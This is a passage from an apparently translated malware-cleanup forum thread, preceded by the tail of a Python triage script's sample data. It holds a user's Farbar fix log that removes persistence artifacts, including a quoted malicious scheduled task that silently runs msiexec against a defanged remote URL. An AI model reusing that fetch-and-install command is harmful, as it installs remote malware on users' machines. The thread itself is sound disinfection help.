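Task: {22222222-3333-4444-5555-666666666666} - System32\Tasks\{BBBBBBBB-CCCC-DDDD-EEEE-FFFFFFFFFFFF} => C:\Program Files (x86)\Common Files\placeholder.exe
Task: {33333333-4444-5555-6666-777777777777} - System32\Tasks\Vendor\Updater => C:\Program Files\Vendor\update.exe /silent
Task: {44444444-5555-6666-7777-888888888888} - System32\Tasks\Repair => msiexec.exe /i C:\Installers\local.msi /qn
'''

if __name__ == '__main__':
    for f in triage(SAMPLE):
        print(f['name'], ','.join(f['reasons']), '|', f['action'])
```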

#10

Hi, here is the Frst log:

Fix result of Farbar Recovery Scan Tool (x64) Version: 01.03.2019
Ran by Michael (01-03-2019 15:39:54) Run:1
Running from C:\Users\Michael\Desktop
Loaded Profiles: Michael (Available Profiles: Michael)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
2019-02-20 23:03 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\mwp5plgzgye
2019-02-20 22:58 - 2019-02-20 22:58 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq
2019-02-20 22:26 - 2019-02-25 20:19 - 000000000 ____D C:\Windows\SysWOW64\qhpduwip
2019-02-20 22:26 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\5fgtl00uoz1
2019-02-20 22:20 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\ex5jjx0e11b
2019-02-20 22:07 - 2019-02-23 23:13 - 000000000 ____D C:\Users\Michael\AppData\Roaming\xazbrsguaeb
2019-02-20 22:03 - 2019-02-20 22:03 - 000003578 _____ C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}
2019-02-20 22:03 - 2019-02-20 22:03 - 000003472 _____ C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-25 23:03 - 2019-02-28 20:43 - 000000000 ____D () C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
Task: {36862642-B4E0-4EE1-8C8A-BAB564791EF6} - System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => "msiexec" -q -i hxxps://refreshnerer711.info/mp2FA19Hb.GWj <==== ATTENTION
Task: {5D11E411-A841-43AC-AF9A-BFF0D70F52BB} - System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe
C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
*****************

Processes closed successfully.
Error: (0) Failed to create a restore point.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
C:\Users\Michael\AppData\Roaming\mwp5plgzgye => moved successfully
C:\Users\Michael\AppData\Roaming\ytvjbkdd0kq => moved successfully
C:\Windows\SysWOW64\qhpduwip => moved successfully
C:\Users\Michael\AppData\Roaming\5fgtl00uoz1 => moved successfully
C:\Users\Michael\AppData\Roaming\ex5jjx0e11b => moved successfully
C:\Users\Michael\AppData\Roaming\xazbrsguaeb => moved successfully
C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150} => moved successfully
C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863} => moved successfully
C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76} => moved successfully
C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9} => moved successfully
C:\Windows\SysWOW64\3082 => moved successfully
C:\Windows\SysWOW64\2052 => moved successfully
C:\Windows\SysWOW64\1055 => moved successfully
C:\Windows\SysWOW64\1049 => moved successfully
C:\Windows\SysWOW64\1046 => moved successfully
C:\Windows\SysWOW64\1045 => moved successfully
C:\Windows\SysWOW64\1042 => moved successfully
C:\Windows\SysWOW64\1041 => moved successfully
C:\Windows\SysWOW64\1040 => moved successfully
C:\Windows\SysWOW64\1036 => moved successfully
C:\Windows\SysWOW64\1033 => moved successfully
C:\Windows\SysWOW64\1031 => moved successfully
C:\Windows\SysWOW64\1029 => moved successfully
C:\Windows\SysWOW64\1028 => moved successfully
C:\Windows\system32\3082 => moved successfully
C:\Windows\system32\2052 => moved successfully
C:\Windows\system32\1055 => moved successfully
C:\Windows\system32\1049 => moved successfully
C:\Windows\system32\1046 => moved successfully
C:\Windows\system32\1045 => moved successfully
C:\Windows\system32\1042 => moved successfully
C:\Windows\system32\1041 => moved successfully
C:\Windows\system32\1040 => moved successfully
C:\Windows\system32\1036 => moved successfully
C:\Windows\system32\1033 => moved successfully
C:\Windows\system32\1031 => moved successfully
C:\Windows\system32\1029 => moved successfully
C:\Windows\system32\1028 => moved successfully
C:\Users\Michael\AppData\Local\Temp\ImagingEngine.dll => moved successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{36862642-B4E0-4EE1-8C8A-BAB564791EF6}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{36862642-B4E0-4EE1-8C8A-BAB564791EF6}" => removed successfully
"C:\Windows\System32\Tasks\{5FD437EB-B8FD-6770-A341-781CF526B150}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5FD437EB-B8FD-6770-A341-781CF526B150}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5D11E411-A841-43AC-AF9A-BFF0D70F52BB}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D11E411-A841-43AC-AF9A-BFF0D70F52BB}" => removed successfully
"C:\Windows\System32\Tasks\{5ECEA90F-9A09-5605-7F57-64045EF8E863}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5ECEA90F-9A09-5605-7F57-64045EF8E863}" => removed successfully
"C:\Program Files (x86)\Common Files\AiuuuByEYaObo.exe" => not found

========= ipconfig /flushdns =========


Configuración IP de Windows

Se vació correctamente la caché de resolución de DNS.

========= End of CMD: =========


========= ipconfig /renew =========


Configuración IP de Windows


Adaptador de Ethernet Conexión de área local:

   Sufijo DNS específico para la conexión. . : Home
   Vínculo: dirección IPv6 local. . . : fe80::6c2a:7ecf:3cd2:d189%14
   Dirección IPv4. . . . . . . . . . . . . . : 192.168.1.41
   Máscara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 192.168.1.1

Adaptador de túnel isatap.Home:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS específico para la conexión. . : Home

========= End of CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset =========


El catálogo Winsock se restableció correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= End of CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= End of CMD: =========


========= netsh int ipv4 reset =========

Global se restableció correctamente.
Interfaz se restableció correctamente.
Reinicie el equipo para completar esta acción.


========= End of CMD: =========


========= netsh int ipv6 reset =========

No hay valores configurados por el usuario para restablecer.


========= End of CMD: =========


========= RemoveProxy: =========

"HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => removed successfully
"HKU\S-1-5-21-3080345679-4159888177-3250997579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5911008 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 2662361 B
Edge => 0 B
Chrome => 385884317 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83597 B
systemprofile32 => 66228 B
LocalService => 66228 B
NetworkService => 2014 B
Michael => 2782046 B

RecycleBin => 0 B
EmptyTemp: => 391 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:40:03 ====

By the way, where was the registry backup I made with DelFix saved? I know it is important to always have a working backup for any future problems the PC might have, but I'm just curious. Thanks :slight_smile:

#11

Hello:

Here is the manual:

The location would be:

C:/windows/erunt/Delfix.

Tell us how the computer feels; test it, restart it a couple of times, and let us know whether everything is in order now.

Regards.

#12

Hi, thank you sooooo very much! :smiley: The PC is all fine, it's not sick anymore :slight_smile: it no longer gives any problems.

1 like
#13

Hello:

To remove the tools used:

Download >> Delfix to your desktop.

  • Double-click to run it. (If you use Windows Vista/7/8/10, right-click and select >> “Run as administrator”)
  • Check the boxes Remove disinfection tools and Purge System Restore
  • Click Run.

The report (DelFix.txt) will open; save it in case it is needed and close the tool.

Glad we were able to resolve your issue…:+1:

For other problems, you know where to find us. :wink:

Topic solved

Regards.

closed #14